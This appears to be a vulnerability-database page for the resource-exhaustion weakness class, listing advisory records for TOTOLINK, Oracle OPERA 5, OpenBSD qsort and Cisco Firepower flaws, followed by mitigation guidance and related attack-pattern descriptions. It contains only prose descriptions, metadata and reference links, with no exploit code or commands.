Vulnerability from github – Published: 2025-08-18 21:31 – Updated: 2025-08-18 21:31
VLAI
Details

TOTOLINK A3002R v4.0.0-B20230531.1404 was discovered to contain a buffer overflow in the fw_ip parameter at /boafrm/formPortFw. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-55588"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-18T20:15:31Z",
    "severity": "HIGH"
  },
  "details": "TOTOLINK A3002R v4.0.0-B20230531.1404 was discovered to contain a buffer overflow in the fw_ip parameter at /boafrm/formPortFw. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.",
  "id": "GHSA-wccq-3q4q-x242",
  "modified": "2025-08-18T21:31:21Z",
  "published": "2025-08-18T21:31:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55588"
    },
    {
      "type": "WEB",
      "url": "https://github.com/goldenGlow21/softwares_PoC/blob/main/A3002R_V4/Boa%20-%20BOF/formPortFw%20PoC.md"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WCG3-V8J6-C8GG

Vulnerability from github – Published: 2025-01-21 21:30 – Updated: 2025-01-21 21:30
VLAI
Details

Vulnerability in the Oracle Hospitality OPERA 5 product of Oracle Hospitality Applications (component: Opera Servlet). Supported versions that are affected are 5.6.19.20, 5.6.25.8, 5.6.26.6 and 5.6.27.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hospitality OPERA 5 accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Hospitality OPERA 5. CVSS 3.1 Base Score 9.1 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-21547"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-770"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-21T21:15:21Z",
    "severity": "CRITICAL"
  },
  "details": "Vulnerability in the Oracle Hospitality OPERA 5 product of Oracle Hospitality Applications (component: Opera Servlet).  Supported versions that are affected are 5.6.19.20, 5.6.25.8, 5.6.26.6 and  5.6.27.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5.  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle Hospitality OPERA 5 accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Hospitality OPERA 5. CVSS 3.1 Base Score 9.1 (Confidentiality and Availability impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H).",
  "id": "GHSA-wcg3-v8j6-c8gg",
  "modified": "2025-01-21T21:30:56Z",
  "published": "2025-01-21T21:30:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-21547"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujan2025.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WCG9-65QX-C5VJ

Vulnerability from github – Published: 2022-05-17 00:31 – Updated: 2025-04-20 03:39
VLAI
Details

The OpenBSD qsort() function is recursive, and not randomized, an attacker can construct a pathological input array of N elements that causes qsort() to deterministically recurse N/4 times. This allows attackers to consume arbitrary amounts of stack memory and manipulate stack memory to assist in arbitrary code execution attacks. This affects OpenBSD 6.1 and possibly earlier versions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-1000373"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-06-19T16:29:00Z",
    "severity": "MODERATE"
  },
  "details": "The OpenBSD qsort() function is recursive, and not randomized, an attacker can construct a pathological input array of N elements that causes qsort() to deterministically recurse N/4 times. This allows attackers to consume arbitrary amounts of stack memory and manipulate stack memory to assist in arbitrary code execution attacks. This affects OpenBSD 6.1 and possibly earlier versions.",
  "id": "GHSA-wcg9-65qx-c5vj",
  "modified": "2025-04-20T03:39:20Z",
  "published": "2022-05-17T00:31:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000373"
    },
    {
      "type": "WEB",
      "url": "https://cvsweb.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/qsort.c?rev=1.15\u0026content-type=text/x-cvsweb-markup"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/HT208112"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/HT208113"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/HT208115"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/HT208144"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/42271"
    },
    {
      "type": "WEB",
      "url": "https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/99177"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1039427"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WCHF-39Q2-HFMR

Vulnerability from github – Published: 2022-05-13 01:35 – Updated: 2022-05-13 01:35
VLAI
Details

A vulnerability in the Secure Sockets Layer (SSL) packet reassembly functionality of the detection engine in Cisco Firepower System Software could allow an unauthenticated, remote attacker to cause the detection engine to consume excessive system memory on an affected device, which could cause a denial of service (DoS) condition. The vulnerability is due to the affected software improperly handling changes to SSL connection states. An attacker could exploit this vulnerability by sending crafted SSL connections through an affected device. A successful exploit could allow the attacker to cause the detection engine to consume excessive system memory on the affected device, which could cause a DoS condition. The device may need to be reloaded manually to recover from this condition. This vulnerability affects Cisco Firepower System Software Releases 6.0.0 and later, running on any of the following Cisco products: Adaptive Security Appliance (ASA) 5500-X Series Firewalls with FirePOWER Services, Adaptive Security Appliance (ASA) 5500-X Series Next-Generation Firewalls, Advanced Malware Protection (AMP) for Networks, 7000 Series Appliances, Advanced Malware Protection (AMP) for Networks, 8000 Series Appliances, Firepower 4100 Series Appliances, FirePOWER 7000 Series Appliances, FirePOWER 8000 Series Appliances, Firepower 9300 Series Security Appliances, Firepower Threat Defense for Integrated Services Routers (ISRs), Firepower Threat Defense Virtual for VMware, Industrial Security Appliance 3000, Sourcefire 3D System Appliances. Cisco Bug IDs: CSCve23031.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-0233"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-04-19T20:29:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the Secure Sockets Layer (SSL) packet reassembly functionality of the detection engine in Cisco Firepower System Software could allow an unauthenticated, remote attacker to cause the detection engine to consume excessive system memory on an affected device, which could cause a denial of service (DoS) condition. The vulnerability is due to the affected software improperly handling changes to SSL connection states. An attacker could exploit this vulnerability by sending crafted SSL connections through an affected device. A successful exploit could allow the attacker to cause the detection engine to consume excessive system memory on the affected device, which could cause a DoS condition. The device may need to be reloaded manually to recover from this condition. This vulnerability affects Cisco Firepower System Software Releases 6.0.0 and later, running on any of the following Cisco products: Adaptive Security Appliance (ASA) 5500-X Series Firewalls with FirePOWER Services, Adaptive Security Appliance (ASA) 5500-X Series Next-Generation Firewalls, Advanced Malware Protection (AMP) for Networks, 7000 Series Appliances, Advanced Malware Protection (AMP) for Networks, 8000 Series Appliances, Firepower 4100 Series Appliances, FirePOWER 7000 Series Appliances, FirePOWER 8000 Series Appliances, Firepower 9300 Series Security Appliances, Firepower Threat Defense for Integrated Services Routers (ISRs), Firepower Threat Defense Virtual for VMware, Industrial Security Appliance 3000, Sourcefire 3D System Appliances. Cisco Bug IDs: CSCve23031.",
  "id": "GHSA-wchf-39q2-hfmr",
  "modified": "2022-05-13T01:35:33Z",
  "published": "2022-05-13T01:35:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-0233"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180418-fpsnort"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/103930"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.

Mitigation
Architecture and Design
  • Mitigation of resource exhaustion attacks requires that the target system either:
  • The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
  • The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
  • recognizes the attack and denies that user further access for a given amount of time, or
  • uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Architecture and Design

Ensure that protocols have specific limits of scale placed on them.

Mitigation
Implementation

Ensure that all failures in resource allocation place the system into a safe posture.

CAPEC-147: XML Ping of the Death

An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.

CAPEC-227: Sustained Client Engagement

An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.

CAPEC-492: Regular Expression Exponential Blowup

An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.